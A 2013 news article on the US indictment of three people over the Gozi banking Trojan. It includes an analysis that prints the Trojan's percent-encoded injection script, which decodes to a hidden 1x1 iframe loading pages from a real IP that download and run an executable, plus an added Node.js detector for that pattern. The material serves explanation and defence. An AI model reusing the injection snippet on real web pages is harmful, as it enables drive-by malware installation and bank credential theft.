Gotcha! U.S. accuses three people of Gozi Trojan bank raid spree – now seeking extradition

// January 24th, 2013 // Hacking and Security


The Gozi Trojan first surfaced in 2007 and was believed to have been active for months before being detected by AV vendors (some heuristic scanners would flag it as “suspicious”). Described as one of the most financially destructive computer viruses in history, the Gozi (pronounced goh-zee) Trojan was coded to “redesign” bank web pages, allowing the hackers to obtain private information such as login credentials and three-factor authentication data. Over the years it has infected Microsoft Windows computers in the US, UK, Germany, Poland, France, Finland, Italy, Turkey and elsewhere. Gozi was distributed in various guises, most commonly disguised as a benign PDF document. The code was then rented out on a weekly basis through a business called “76 Service”, which was advertised on various underground cybercrime forums. Now the United States has accused three people of using the bank-account raiding Trojan to infect at least one million computers and steal millions of dollars.

Russian national Nikita Kuzmin, 25, Latvian resident Deniss Calovskis, 27, and Mihai Ionut Paunescu, a 28-year-old Romanian, were behind the scam, according to charges filed against them. The allegations were revealed in an indictment unsealed on Wednesday, 23 January. The US wants to extradite both Calovskis and Paunescu from their respective countries.

FBI Assistant Director-in-Charge George Venizelos said:

This long-term investigation uncovered an alleged international cybercrime ring whose far-reaching schemes infected at least one million computers worldwide and 40,000 in the US, and resulted in the theft or loss of tens of millions of dollars. Banking Trojans are to cyber criminals what safe-cracking or acetylene torches are to traditional bank burglars – but far more effective and less detectable. The investigation put an end to the Gozi virus.

According to the BBC:

Kuzmin, who masterminded the Trojan, was arrested in the US in November 2010 and pled guilty to various computer hacking and fraud charges in May 2011. Calovskis, who allegedly helped program Gozi, was arrested in Latvia in November 2012. Paunescu (AKA Virus) allegedly supplied the “bulletproof web hosting” service that helped Kuzmin and other crooks distribute the Trojan as well as ZeuS, SpyEye and other malware – some linked to spam distribution and DDoS shenanigans. Paunescu was arrested in Romania in December 2012.

Examination of the Gozi Trojan code

On a typically infected machine, the browser cache would contain a page with this script block:

<SCRIPT language=javascript> document.write(
unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20
%68%74%74%70%3A%2F%2F%38%31%2E%31%35%2E%31%34%36
%2E%34%32%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66
%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77
%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D
%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E
%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E
%3C%2F%69%66%72%61%6D%65%3E' ) ) ;</SCRIPT>

When the browser runs it, the script writes the following content to the current web page:


<iframe src= http://81.15.146.42/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

That page simply contains another IFRAME:

<iframe src= http://81.15.146.42/counter.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

The page included in this last IFRAME contained JavaScript code using XMLHTTP and ADODB (ActiveX Data Objects) functions to download and run an EXE file which was hosted on the same server.
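As an added example (not code from the original article or from the investigation), this Node.js triage script finds document.write(unescape(...)) blocks in cached HTML, decodes them, and reports any iframe sized 1x1 or smaller. The function names and the sample page, which uses the documentation address 192.0.2.10, are constructed for illustration.

```javascript
// Added example: triage cached HTML for the injection pattern shown above.
// Function names and SAMPLE_PAGE are constructed; 192.0.2.10 is a documentation address.

// document.write(unescape('...')) with a single quoted argument.
const WRITE_UNESCAPE = /document\.write\(\s*unescape\(\s*(['"])([\s\S]*?)\1\s*\)\s*\)/gi;

// Decode %XX like legacy unescape(), never throwing on malformed input.
// Line wraps inside the encoded string (as in the cached copy above) are removed first.
function decodePercent(s) {
  return s.replace(/\s*[\r\n]+\s*/g, '')
          .replace(/%([0-9a-f]{2})/gi, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Read one attribute value, quoted or bare (the sample uses both styles).
function attr(tag, name) {
  const m = new RegExp('\\b' + name + '\\s*=\\s*["\']?([^\\s"\'>]+)', 'i').exec(tag);
  return m ? m[1] : null;
}

// Return every iframe of at most 1x1 pixels that a page writes via an encoded string.
function findHiddenIframes(html) {
  const findings = [];
  for (const m of html.matchAll(WRITE_UNESCAPE)) {
    const decoded = decodePercent(m[2]);
    for (const [tag] of decoded.matchAll(/<iframe\b[^>]*>/gi)) {
      const width = parseInt(attr(tag, 'width'), 10);
      const height = parseInt(attr(tag, 'height'), 10);
      if (width <= 1 && height <= 1) {
        findings.push({ src: attr(tag, 'src'), width, height });
      }
    }
  }
  return findings;
}

// Constructed sample: one encoded hidden iframe, one benign encoded write, one visible iframe.
const encodeAll = (s) =>
  [...s].map((c) => '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
const enc = encodeAll('<iframe src= http://192.0.2.10/index.html frameborder="0" ' +
  'width="1" height="1" scrolling="no" name=counter></iframe>');
const SAMPLE_PAGE =
  '<html><body><SCRIPT language=javascript> document.write(\nunescape( \'' +
  enc.slice(0, 60) + '\n' + enc.slice(60) + '\' ) ) ;</SCRIPT>' +
  '<script>document.write(unescape("%3Cb%3Ehello%3C%2Fb%3E"));</script>' +
  '<iframe src="/video" width="640" height="360"></iframe></body></html>';

console.log(findHiddenIframes(SAMPLE_PAGE));
```

Only the encoded 1x1 frame is reported; the benign encoded write and the visible 640x360 frame are ignored.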

Sources: BBC, US Department of Justice